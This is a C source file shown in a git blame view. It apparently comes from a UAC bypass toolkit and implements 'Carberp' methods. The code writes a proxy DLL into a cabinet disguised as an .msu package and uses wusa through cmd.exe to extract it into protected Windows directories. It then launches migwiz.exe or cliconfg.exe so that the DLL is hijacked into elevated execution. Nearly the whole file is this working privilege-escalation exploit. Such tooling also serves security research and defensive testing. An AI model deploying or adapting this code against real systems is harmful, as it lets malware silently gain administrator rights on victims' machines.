2015-03-29 08:12:55 +00:00
|
|
|
/*******************************************************************************
|
|
|
|
|
*
|
2017-02-19 05:48:36 +00:00
|
|
|
* (C) COPYRIGHT AUTHORS, 2014 - 2017
|
2015-03-29 08:12:55 +00:00
|
|
|
*
|
|
|
|
|
* TITLE: CARBERP.C
|
|
|
|
|
*
|
2017-02-19 05:48:36 +00:00
|
|
|
* VERSION: 2.56
|
2015-03-29 08:12:55 +00:00
|
|
|
*
|
2017-02-19 05:48:36 +00:00
|
|
|
* DATE: 15 Feb 2017
|
2015-03-29 08:12:55 +00:00
|
|
|
*
|
2015-03-30 07:03:39 +00:00
|
|
|
* Tweaked Carberp methods.
|
2015-03-29 08:12:55 +00:00
|
|
|
* Original Carberp is exploiting mcx2prov.exe in ehome.
|
|
|
|
|
*
|
|
|
|
|
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
|
|
|
|
|
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
|
|
|
|
|
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
|
|
|
|
|
* PARTICULAR PURPOSE.
|
|
|
|
|
*
|
|
|
|
|
*******************************************************************************/
|
|
|
|
|
#include "global.h"
|
2015-04-20 08:19:13 +00:00
|
|
|
#include "makecab.h"
|
2015-03-29 08:12:55 +00:00
|
|
|
|
|
|
|
|
/*
|
2015-04-20 08:19:13 +00:00
|
|
|
* ucmWusaExtractPackage
|
2015-03-29 08:12:55 +00:00
|
|
|
*
|
|
|
|
|
* Purpose:
|
|
|
|
|
*
|
2015-04-20 08:19:13 +00:00
|
|
|
* Extract cab to protected directory using wusa.
|
2015-03-29 08:12:55 +00:00
|
|
|
*
|
|
|
|
|
*/
|
2015-04-20 08:19:13 +00:00
|
|
|
BOOL ucmWusaExtractPackage(
|
2016-04-16 03:46:41 +00:00
|
|
|
LPWSTR lpCommandLine
|
|
|
|
|
)
|
2015-03-29 08:12:55 +00:00
|
|
|
{
|
2016-04-16 03:46:41 +00:00
|
|
|
BOOL bResult = FALSE;
|
|
|
|
|
WCHAR szMsuFileName[MAX_PATH * 2];
|
|
|
|
|
WCHAR szCmd[MAX_PATH * 4];
|
|
|
|
|
|
|
|
|
|
RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));
|
|
|
|
|
_strcpy(szMsuFileName, g_ctx.szTempDirectory);
|
|
|
|
|
_strcat(szMsuFileName, ELLOCNAK_MSU);
|
|
|
|
|
|
|
|
|
|
//extract msu data to target directory
|
|
|
|
|
RtlSecureZeroMemory(szCmd, sizeof(szCmd));
|
|
|
|
|
wsprintfW(szCmd, lpCommandLine, szMsuFileName);
|
|
|
|
|
bResult = supRunProcess(L"cmd.exe", szCmd);
|
|
|
|
|
|
|
|
|
|
if (szMsuFileName[0] != 0) {
|
|
|
|
|
DeleteFileW(szMsuFileName);
|
|
|
|
|
}
|
|
|
|
|
return bResult;
|
2015-04-05 16:28:52 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
|
|
/*
|
|
|
|
|
* ucmWusaMethod
|
|
|
|
|
*
|
|
|
|
|
* Purpose:
|
|
|
|
|
*
|
|
|
|
|
* Build and install fake msu package then run target application.
|
|
|
|
|
*
|
|
|
|
|
*/
|
|
|
|
|
BOOL ucmWusaMethod(
|
2016-04-16 03:46:41 +00:00
|
|
|
UACBYPASSMETHOD Method,
|
|
|
|
|
PVOID ProxyDll,
|
|
|
|
|
DWORD ProxyDllSize
|
|
|
|
|
)
|
2015-04-05 16:28:52 +00:00
|
|
|
{
|
2016-04-16 03:46:41 +00:00
|
|
|
BOOL bResult = FALSE, cond = FALSE;
|
|
|
|
|
LPWSTR lpCommandLine;
|
|
|
|
|
WCHAR szSourceDll[MAX_PATH * 2];
|
|
|
|
|
WCHAR szTargetProcess[MAX_PATH * 2];
|
|
|
|
|
|
|
|
|
|
if ((ProxyDll == NULL) || (ProxyDllSize == 0)) {
|
|
|
|
|
return FALSE;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
_strcpy(szTargetProcess, g_ctx.szSystemDirectory);
|
|
|
|
|
_strcpy(szSourceDll, g_ctx.szTempDirectory);
|
|
|
|
|
|
|
|
|
|
switch (Method) {
|
|
|
|
|
|
|
|
|
|
//use migwiz.exe as target
|
|
|
|
|
case UacMethodCarberp1:
|
|
|
|
|
_strcat(szSourceDll, WDSCORE_DLL);
|
|
|
|
|
lpCommandLine = CMD_EXTRACT_MIGWIZ;
|
2016-05-29 08:05:10 +00:00
|
|
|
_strcat(szTargetProcess, MIGWIZ_DIR);
|
2016-04-16 03:46:41 +00:00
|
|
|
_strcat(szTargetProcess, MIGWIZ_EXE);
|
|
|
|
|
break;
|
|
|
|
|
|
|
|
|
|
//use cliconfg.exe as target
|
|
|
|
|
case UacMethodCarberp2:
|
|
|
|
|
_strcat(szSourceDll, NTWDBLIB_DLL);
|
|
|
|
|
lpCommandLine = CMD_EXTRACT_SYSTEM32;
|
|
|
|
|
_strcat(szTargetProcess, CLICONFG_EXE);
|
|
|
|
|
break;
|
|
|
|
|
|
|
|
|
|
default:
|
|
|
|
|
return FALSE;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
if (!PathFileExists(szTargetProcess)) {
|
2017-02-19 05:48:36 +00:00
|
|
|
supDebugPrint(TEXT("ucmWusaMethod"), ERROR_FILE_NOT_FOUND);
|
2016-04-16 03:46:41 +00:00
|
|
|
return FALSE;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
do {
|
|
|
|
|
|
|
|
|
|
//
|
|
|
|
|
// Extract file to the protected directory
|
|
|
|
|
// First, create cab with fake msu ext, second run fusion process.
|
|
|
|
|
//
|
|
|
|
|
if (!ucmCreateCabinetForSingleFile(szSourceDll, ProxyDll, ProxyDllSize)) {
|
|
|
|
|
break;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
if (!ucmWusaExtractPackage(lpCommandLine)) {
|
|
|
|
|
break;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
//run target process for dll hijacking
|
|
|
|
|
bResult = supRunProcess(szTargetProcess, NULL);
|
|
|
|
|
|
|
|
|
|
} while (cond);
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
return bResult;
|
2015-04-20 08:19:13 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
|
|
/*
|
|
|
|
|
* ucmCreateCabinetForSingleFile
|
|
|
|
|
*
|
|
|
|
|
* Purpose:
|
|
|
|
|
*
|
|
|
|
|
* Build cabinet for usage in methods where required 1 file.
|
|
|
|
|
*
|
|
|
|
|
*/
|
|
|
|
|
BOOL ucmCreateCabinetForSingleFile(
|
2016-04-16 03:46:41 +00:00
|
|
|
LPWSTR lpSourceDll,
|
|
|
|
|
PVOID ProxyDll,
|
|
|
|
|
DWORD ProxyDllSize
|
|
|
|
|
)
|
2015-04-20 08:19:13 +00:00
|
|
|
{
|
2016-04-16 03:46:41 +00:00
|
|
|
BOOL cond = FALSE, bResult = FALSE;
|
|
|
|
|
CABDATA *Cabinet = NULL;
|
|
|
|
|
LPWSTR lpFileName;
|
|
|
|
|
WCHAR szMsuFileName[MAX_PATH * 2];
|
|
|
|
|
|
|
|
|
|
if ((ProxyDll == NULL) || (ProxyDllSize == 0)) {
|
|
|
|
|
return FALSE;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
do {
|
|
|
|
|
|
|
|
|
|
//drop proxy dll
|
|
|
|
|
if (!supWriteBufferToFile(lpSourceDll, ProxyDll, ProxyDllSize)) {
|
|
|
|
|
break;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
//build cabinet
|
|
|
|
|
RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));
|
|
|
|
|
_strcpy(szMsuFileName, g_ctx.szTempDirectory);
|
|
|
|
|
_strcat(szMsuFileName, ELLOCNAK_MSU);
|
|
|
|
|
|
|
|
|
|
Cabinet = cabCreate(szMsuFileName);
|
|
|
|
|
if (Cabinet == NULL)
|
|
|
|
|
break;
|
|
|
|
|
|
|
|
|
|
lpFileName = _filename(lpSourceDll);
|
|
|
|
|
//put file without compression
|
|
|
|
|
bResult = cabAddFile(Cabinet, lpSourceDll, lpFileName);
|
|
|
|
|
cabClose(Cabinet);
|
|
|
|
|
|
|
|
|
|
} while (cond);
|
|
|
|
|
|
|
|
|
|
return bResult;
|
2015-03-29 08:12:55 +00:00
|
|
|
}
|
